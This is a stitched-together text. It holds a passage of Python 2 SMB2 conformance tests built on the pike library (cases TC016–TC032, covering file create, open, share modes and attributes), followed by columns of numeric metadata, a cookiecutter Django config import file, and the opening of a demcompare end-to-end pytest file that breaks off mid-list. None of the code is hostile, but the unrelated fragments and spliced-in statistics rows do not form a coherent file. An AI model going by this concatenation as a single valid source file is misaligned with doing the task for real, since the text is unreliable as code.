self.assertRegexpMatches(actual_status,expected_status)
print "TC016 has passed"
def test_open_file_append_write(self):
buffer2 = "@calsoft"
try:
print "-------------------------------------------"
print "TC 017 - Open a file with append and write permission with MAXIMUM ALLOWED flag."
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create017.txt',access = pike.smb2.MAXIMUM_ALLOWED|pike.smb2.FILE_APPEND_DATA|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Trying to write buffer"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Buffer write successful"
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create017.txt',access = pike.smb2.MAXIMUM_ALLOWED|pike.smb2.FILE_APPEND_DATA|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File Open successful"
print "Trying to append buffer"
bytes_written2 = chan.write(file_handle1,14,buffer2)
print "Append data successful"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
final_buffer = len(self.buffer) + len(buffer2)
print "The final buffer length is :",final_buffer
final_bytes_written = int(bytes_written + bytes_written2)
print "The final buffer written length is :",final_bytes_written
print "Matching final buffer and final_bytes_written"
if final_buffer == final_bytes_written:
actual_status = 'STATUS_SUCCESS'
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC017 has passed"
def test_open_file_genericall_readonly(self):
try:
print "-------------------------------------------"
print "TC 018 - Open with generic all with read only permissions. Try to write the file."
expected_status = "STATUS_ACCESS_DENIED"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create018.txt',access = pike.smb2.GENERIC_ALL,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File creation successful"
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create018.txt',access = pike.smb2.GENERIC_ALL,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE,attributes=pike.smb2.FILE_ATTRIBUTE_READONLY).result()
print "File Open successful"
print "Trying to write data"
bytes_written = chan.write(file_handle1,0,self.buffer)
print "Buffer write successful"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e :
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC018 has passed"
def test_open_file_genericall_readwrite(self):
try:
print "----------------------------------------------"
print "TC019 - Open with generic all with read-write permissions. try to write and then read the written data"
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening file"
file_handle = chan.create(tree,'Create019.txt',access = pike.smb2.GENERIC_ALL|pike.smb2.FILE_READ_DATA|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creat and open successful"
print "Try to write data"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Write buffer successful"
print "Try to read data"
bytes_read = chan.read(file_handle,len(self.buffer),0)
print "Buffer read successful"
print "The length of bytes written:",bytes_written
print "The length of bytes read :",len(bytes_read)
print "Matching bytes_written and length of bytes_read"
if bytes_written == len(bytes_read):
actual_status = "STATUS_SUCCESS"
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successful"
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC019 has passed"
def test_open_file_genericaall_writeonly(self):
try:
print "---------------------------------------------"
print "TC020 - Open file with generic all and write only permissions and try to read"
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create020.txt',access = pike.smb2.GENERIC_ALL|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Trying to write data"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Write bufffer successful"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create020.txt',access = pike.smb2.GENERIC_ALL|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File open successfull"
print "Trying to read data"
bytes_read = chan.read(file_handle1,len(self.buffer),0)
print "Read data successfull"
print "The length of bytes written:",bytes_written
print "The length of bytes read :",len(bytes_read)
print "Matching bytes_written and length of bytes_read"
if bytes_written == len(bytes_read):
actual_status = "STATUS_SUCCESS"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC020 has passed"
def test_open_genericwrite(self):
try:
print "---------------------------------------------"
print "TC 021 - open a file with generic write and try to write."
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan, tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create021.txt',access = pike.smb2.GENERIC_WRITE,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create021.txt',access = pike.smb2.GENERIC_WRITE,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File open successfull"
print "Try to write data"
bytes_written = chan.write(file_handle1,0,self.buffer)
print "Write data successfull"
print "The length of bytes written:",bytes_written
print "The length of buffer is :",len(self.buffer)
print "Matching the length of buffer and bytes_written"
if len(self.buffer) == bytes_written:
actual_status = "STATUS_SUCCESS"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual Status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC021 has passed"
def test_open_genericwrite_writeattr(self):
try:
print "-------------------------------------------"
print "TC 022 - open a file with generic write and write Attributes and try to change attributes"
expected_status = "FILE_ATTRIBUTE_READONLY"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create022.txt',access = pike.smb2.GENERIC_WRITE|pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Trying to read the attribute of file"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute = info.basic_information.file_attributes
print "When file created file attribute is :",file_create_attribute
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create022.txt',access = pike.smb2.GENERIC_WRITE|pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File open successfull"
print "Trying to change the attribute of file"
with chan.set_file_info(file_handle1, pike.smb2.FileBasicInformation) as file_info:
file_info.file_attributes = pike.smb2.FILE_ATTRIBUTE_READONLY
print "Querying the file and checking the new file attribute"
info1 = chan.query_file_info(file_handle1,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute_new = info1.basic_information.file_attributes
print "The new file attribute after change is :",file_create_attribute_new
actual_status =str(file_create_attribute_new)
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual File Attribute :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC022 has passed"
def test_open_genericread(self):
try:
print "---------------------------------------------"
print "TC 023 -open a file with generic read and try to read data."
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create023.txt',access = pike.smb2.GENERIC_READ|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Trying to write buffer"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Buffer write successful"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create023.txt',access = pike.smb2.GENERIC_READ,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File open successfull"
print "Trying to read the buffer"
bytes_read = chan.read(file_handle1,len(self.buffer),0)
print "Buffer read successful"
print "The length of bytes written is :",bytes_written
print "The length of bytes read is :",len(bytes_read)
print "Matching the bytes_written and length of bytes_read"
if bytes_written == len(bytes_read):
actual_status = "STATUS_SUCCESS"
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual Status is :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC023 has passed"
def test_open_genericread_attr(self):
try:
print "---------------------------------------------"
print "TC 024 - open a file with generic read and read Attributes."
expected_status = "FILE_ATTRIBUTE_ARCHIVE"
print "Expected status: ",expected_status
print "Creating session and treeconnect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating file"
file_handle = chan.create(tree,'Create024.txt',access = pike.smb2.GENERIC_READ,disposition = pike.smb2.FILE_CREATE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File creation successful"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Opening the file"
file_handle1 = chan.create(tree,'Create024.txt',access = pike.smb2.GENERIC_READ,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "File open successfull"
print "Querying the file to read the attribute"
info = chan.query_file_info(file_handle1,pike.smb2.FILE_ALL_INFORMATION)
file_create_attribute = info.basic_information.file_attributes
print "When file created file attribute is :",file_create_attribute
print "Close the second file handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
actual_status = str(file_create_attribute)
except Exception as e:
actual_status = str(e)
print "Actual status :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC024 has passed"
def test_open_shareread(self):
try:
print "---------------------------------------------"
print "TC 025 - Open a file with file share read. Over a different session open the same with file for write"
expected_status = "STATUS_SHARING_VIOLATION"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file with FILE_SHARE_READ with GENERIC_READ"
file_handle = chan.create(tree,'Create025.txt',access = pike.smb2.GENERIC_READ,share= pike.smb2.FILE_SHARE_READ,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file with GENERIC_WRITE and FILE_SHARE_READ"
file_handle1 = chan1.create(tree1,'Create025.txt',access = pike.smb2.GENERIC_WRITE,share = pike.smb2.FILE_SHARE_READ,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Trying to write data into file"
bytes_written = chan.write(file_handle1,0,self.buffer)
print "Write buffer successful"
print "Closing first handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Closing second handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC025 has passed"
def test_open_shareread_delete(self):
try:
print "-----------------------------------------------"
print "TC 026 - Open a file with file share read. Over a different session, open a file with deleteflag set."
expected_status = "STATUS_SHARING_VIOLATION"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file with FILE_SHARE_READ and GENERIC_READ"
file_handle = chan.create(tree,'Create026.txt',access = pike.smb2.GENERIC_READ,share= pike.smb2.FILE_SHARE_READ,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file with DELETE and FILE_SHARE_READ"
file_handle1 = chan1.create(tree1,'Create026.txt',access = pike.smb2.DELETE,share = pike.smb2.FILE_SHARE_READ,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Closing first handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Closing second handle"
chan.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC026 has passed"
def test_open_sharewrite(self):
buffer1 = "@Calsoft"
try:
print "------------------------------------------------"
print "TC 027 - Open a file with file share write and from different session, open for write. Try writing to different areas of files"
expected_status = "STATUS_SUCCESS"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file with FILE_SHARE_WRITE and FILE_WRITE_DATA"
file_handle = chan.create(tree,'Create027.txt',access = pike.smb2.FILE_WRITE_DATA,share= pike.smb2.FILE_SHARE_WRITE,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file with FILE_WRITE_DATA and FILE_SHARE_WRITE"
file_handle1 = chan1.create(tree1,'Create027.txt',access = pike.smb2.FILE_WRITE_DATA,share = pike.smb2.FILE_SHARE_WRITE,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Writing data into it"
bytes_written = chan1.write(file_handle1,0,self.buffer)
if bytes_written == len(self.buffer):
print "Write buffer successful"
print "Appending data"
bytes_written1 = chan1.write(file_handle1,20,buffer1)
if bytes_written1 == len(buffer1):
print "Append data successful"
actual_status = "STATUS_SUCCESS"
print "Closing first handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Closing second handle"
chan1.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC027 has passed"
def test_open_sharewrite_read(self):
try:
print "------------------------------------------------"
print "TC 028 - Open a file with file share write and then open from different session with file share read."
expected_status = "STATUS_SHARING_VIOLATION"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file with FILE_SHARE_WRITE and FILE_WRITE_DATA"
file_handle = chan.create(tree,'Create028.txt',access = pike.smb2.FILE_WRITE_DATA,share= pike.smb2.FILE_SHARE_WRITE,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Writing data into it ..."
bytes_written = chan.write(file_handle,0,self.buffer)
print "Write buffer successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file with FILE_WRITE_DATA and FILE_SHARE_READ"
file_handle1 = chan1.create(tree1,'Create028.txt',access = pike.smb2.FILE_WRITE_DATA,share = pike.smb2.FILE_SHARE_READ,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Trying to read data ..."
bytes_read = chan.read(file_handle1,len(self.buffer),0)
print "Read data successful"
print "Close the first handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Close the second handle"
chan1.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status :",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC028 has passed"
def test_open_sharedelete_delete(self):
try:
print "------------------------------------------------"
print "TC 029 - Open a file with file share delete and from a different session open for deletion."
expected_status = "STATUS_SHARING_VIOLATION"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file with FILE_READ_DATA and FILE_SHARE_DELETE"
file_handle = chan.create(tree,'Create029.txt',access = pike.smb2.FILE_READ_DATA,share= pike.smb2.FILE_SHARE_DELETE,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file with DELETE and FILE_SHARE_DELETE"
file_handle1 = chan1.create(tree1,'Create029.txt',access = pike.smb2.DELETE,share = pike.smb2.FILE_SHARE_DELETE,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Close the first handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Close the second handle"
chan1.close(file_handle1)
print "Second file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC029 has passed"
def test_open_sharedelete_session(self):
try:
print "------------------------------------------------"
print "TC 030 - OPen a file for delete from other session. delete that file i.e close the second open before the first one"
expected_status = "STATUS_SHARING_VIOLATION"
print "Expected status: ",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file"
file_handle = chan.create(tree,'Create030.txt',access = pike.smb2.DELETE,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Creating a second session and tree connect"
chan1,tree1 = self.tree_connect()
print "Second Session and treeconnect successful"
print "Opening the same file"
file_handle1 = chan1.create(tree1,'Create030.txt',access = pike.smb2.DELETE,share = pike.smb2.FILE_SHARE_DELETE,disposition = pike.smb2.FILE_OPEN,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Open file successful"
print "Close the second handle"
chan1.close(file_handle1)
print "Second file handle closed successfully"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "TC030 has passed"
def test_open_supersede(self):
try:
print "-----------------------------------------------"
print "TC 031 - Open existing flag with File Supersede. Verify that the file is truncated to zero and the create time has not changed."
expected_status = "STATUS_END_OF_FILE"
print "Expected status:",expected_status
print "Creating a first session and tree connect"
chan,tree = self.tree_connect()
print "Session and treeconnect successful"
print "Creating and opening a file"
file_handle = chan.create(tree,'Create031.txt',access = pike.smb2.FILE_READ_ATTRIBUTES|pike.smb2.FILE_WRITE_DATA,disposition = pike.smb2.FILE_OPEN_IF,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create and open successful"
print "Querying the file and checking creation time"
info = chan.query_file_info(file_handle,pike.smb2.FILE_ALL_INFORMATION)
creation_time = info.basic_information.creation_time
print "When the file created the creation time of file:",creation_time
print "Try to write buffer"
bytes_written = chan.write(file_handle,0,self.buffer)
print "Buffer write successful"
print "Close the first file handle"
chan.close(file_handle)
print "First file handle closed successfully"
print "Creating file with FILE_SUPERSEDE"
file_handle1 = chan.create(tree,'Create031.txt',access = pike.smb2.FILE_READ_ATTRIBUTES|pike.smb2.FILE_READ_DATA,disposition = pike.smb2.FILE_SUPERSEDE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Creation file successful"
print "Query the file and check creation time"
info1 = chan.query_file_info(file_handle1,pike.smb2.FILE_ALL_INFORMATION)
creation_time1 = info1.basic_information.creation_time
print "When the file got supersede creation time:",creation_time1
print "Try to read data "
bytes_read = chan.read(file_handle1,len(self.buffer),0)
print "Read data successful"
print "Bytes read is :",bytes_read
print "Close the first file handle"
chan.close(file_handle1)
print "First file handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
print "Matching the creation times"
self.assertRegexpMatches(str(creation_time),str(creation_time1))
def test_open_file_overwrite(self):
try:
print "-----------------------------------------------"
print "TC 032 - Open a nonexistant file."
expected_status = "STATUS_OBJECT_NAME_NOT_FOUND"
print "Expected status: ",expected_status
print "Creating a session and tree connect"
chan,tree = self.tree_connect()
print "Try overwriting a file"
file_handle = chan.create(tree,'Create032.txt',access = pike.smb2.FILE_READ_ATTRIBUTES,disposition = pike.smb2.FILE_OVERWRITE,options=pike.smb2.FILE_NON_DIRECTORY_FILE).result()
print "Create file successful"
print "Close the file handle"
chan.close(file_handle)
print "File handle closed successfully"
except Exception as e:
actual_status = str(e)
print "Actual status:",actual_status
print "Matching actual_status and expected_status"
self.assertRegexpMatches(actual_status,expected_status)
| 55.856256
| 235
| 0.63023
| 7,235
| 62,950
| 5.298963
| 0.046303
| 0.044238
| 0.056341
| 0.04043
| 0.893917
| 0.868355
| 0.832594
| 0.805441
| 0.794799
| 0.783061
| 0
| 0.015823
| 0.279142
| 62,950
| 1,126
| 236
| 55.905861
| 0.829036
| 0.004321
| 0
| 0.742453
| 0
| 0.008491
| 0.323524
| 0.028161
| 0
| 0
| 0
| 0
| 0.031132
| 0
| null | null | 0.028302
| 0.006604
| null | null | 0.556604
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
4b6448aabc9996a3414b61687edd1947cea88f2b
| 180
|
py
|
Python
|
{{cookiecutter.github_repository_name}}/src/{{cookiecutter.app_name}}/config/__init__.py
|
ehudhala/cookiecutter-django-rest-angular2
|
fd1ccf2a7659feb207872a11159e1c30bb444d31
|
[
"MIT"
] | 16
|
2016-11-04T19:13:16.000Z
|
2018-02-19T18:13:23.000Z
|
{{cookiecutter.github_repository_name}}/src/{{cookiecutter.app_name}}/config/__init__.py
|
ehudhala/cookiecutter-django-rest-angular2
|
fd1ccf2a7659feb207872a11159e1c30bb444d31
|
[
"MIT"
] | null | null | null |
{{cookiecutter.github_repository_name}}/src/{{cookiecutter.app_name}}/config/__init__.py
|
ehudhala/cookiecutter-django-rest-angular2
|
fd1ccf2a7659feb207872a11159e1c30bb444d31
|
[
"MIT"
] | 7
|
2016-11-08T04:31:41.000Z
|
2018-07-30T15:14:02.000Z
|
from __future__ import absolute_import
from {{cookiecutter.app_name}}.config.local import Local # noqa
from {{cookiecutter.app_name}}.config.production import Production # noqa
| 36
| 74
| 0.805556
| 23
| 180
| 6
| 0.478261
| 0.231884
| 0.275362
| 0.333333
| 0.42029
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105556
| 180
| 4
| 75
| 45
| 0.857143
| 0.05
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 1
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
4ba42935831764800d824d7eeeacc9385797376e
| 21,034
|
py
|
Python
|
tests/test_demcompare.py
|
njimenezd/demcompare
|
d0ad8a63b912555a1ee67fcb21f30e3b9036d0c6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_demcompare.py
|
njimenezd/demcompare
|
d0ad8a63b912555a1ee67fcb21f30e3b9036d0c6
|
[
"Apache-2.0"
] | null | null | null |
tests/test_demcompare.py
|
njimenezd/demcompare
|
d0ad8a63b912555a1ee67fcb21f30e3b9036d0c6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf8
#
# Copyright (c) 2021 Centre National d'Etudes Spatiales (CNES).
#
# This file is part of demcompare
# (see https://github.com/CNES/demcompare).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This module contains functions to test Demcompare.
"""
# Standard imports
import os
from tempfile import TemporaryDirectory
# Third party imports
import numpy as np
import pytest
# Demcompare imports
import demcompare
from demcompare.initialization import read_config_file, save_config_file
from demcompare.output_tree_design import get_out_file_path
# Tests helpers
from .helpers import (
TEST_TOL,
assert_same_images,
demcompare_test_data_path,
read_csv_file,
temporary_dir,
)
# Demcompare imports
@pytest.mark.end2end_tests
def test_demcompare_standard_outputs():
    """
    Standard main end2end test.
    Test that the outputs given by the Demcompare execution
    of data/standard/input/test_config.json are the same as the reference ones
    in data/standard/ref_output/
    """
    # Get "standard" test root data directory absolute path
    test_data_path = demcompare_test_data_path("standard")
    # Load "standard" demcompare config from input/test_config.json
    test_cfg = read_config_file(os.path.join(test_data_path, "input/test_config.json"))
    # Get "standard" demcompare reference output path
    test_ref_output_path = os.path.join(test_data_path, "ref_output")

    # Create temporary directory for test output
    with TemporaryDirectory(dir=temporary_dir()) as tmp_dir:
        # Helpers factored out of the original copy-pasted blocks; each
        # one compares a single produced artifact against its reference.

        def assert_cfg_allclose(ref_cfg, out_cfg, *keys):
            # Assert one nested numeric entry of both configs is close.
            ref_val, out_val = ref_cfg, out_cfg
            for key in keys:
                ref_val = ref_val[key]
                out_val = out_val[key]
            np.testing.assert_allclose(ref_val, out_val, atol=TEST_TOL)

        def assert_image_same(rel_path):
            # Assert an output image equals the reference one.
            assert_same_images(
                os.path.join(test_ref_output_path, rel_path),
                os.path.join(tmp_dir, rel_path),
                atol=TEST_TOL,
            )

        def assert_csv_same(rel_path):
            # Assert an output CSV equals the reference one.
            ref_csv = read_csv_file(os.path.join(test_ref_output_path, rel_path))
            out_csv = read_csv_file(os.path.join(tmp_dir, rel_path))
            np.testing.assert_allclose(ref_csv, out_csv, atol=TEST_TOL)

        # Modify test's output dir in configuration to tmp test dir,
        # save the new configuration inside the tmp dir and run demcompare
        test_cfg["outputDir"] = tmp_dir
        tmp_cfg_file = os.path.join(tmp_dir, "test_config.json")
        save_config_file(tmp_cfg_file, test_cfg)
        demcompare.run(tmp_cfg_file)

        # TEST JSON CONFIGURATION
        # Check initial config "test_config.json"
        cfg_file = "test_config.json"
        ref_output_cfg = read_config_file(os.path.join(test_ref_output_path, cfg_file))
        output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
        np.testing.assert_equal(ref_output_cfg["stats_opts"], output_cfg["stats_opts"])
        np.testing.assert_equal(ref_output_cfg["plani_opts"], output_cfg["plani_opts"])

        # Test final_config.json numeric results
        cfg_file = get_out_file_path("final_config.json")
        ref_output_cfg = read_config_file(os.path.join(test_ref_output_path, cfg_file))
        output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
        assert_cfg_allclose(ref_output_cfg, output_cfg, "plani_results", "dx", "bias_value")
        assert_cfg_allclose(ref_output_cfg, output_cfg, "plani_results", "dy", "bias_value")
        for bound in ("lry", "lrx", "uly", "ulx"):
            assert_cfg_allclose(
                ref_output_cfg, output_cfg, "plani_results", "gdal_translate_bounds", bound
            )
        assert_cfg_allclose(ref_output_cfg, output_cfg, "alti_results", "dz", "bias_value")

        # TEST DIFF TIF and PNG SNAPSHOTS
        for img in (
            "initial_dh.tif",
            "final_dh.tif",
            "initial_dem_diff_pdf.png",
            "final_dem_diff_pdf.png",
            "initial_dem_diff_cdf.png",
            "final_dem_diff_cdf.png",
        ):
            assert_image_same(get_out_file_path(img))

        # TESTS CSV SNAPSHOTS
        for csv_name in (
            "initial_dem_diff_pdf.csv",
            "final_dem_diff_pdf.csv",
            "initial_dem_diff_cdf.csv",
            "final_dem_diff_cdf.csv",
        ):
            assert_csv_same(get_out_file_path(csv_name))

        # TEST CSV STATS (paths are relative to the output dir directly)
        for stats_file in (
            "stats/slope/stats_results_standard.csv",
            "stats/slope/stats_results_incoherent-classification.csv",
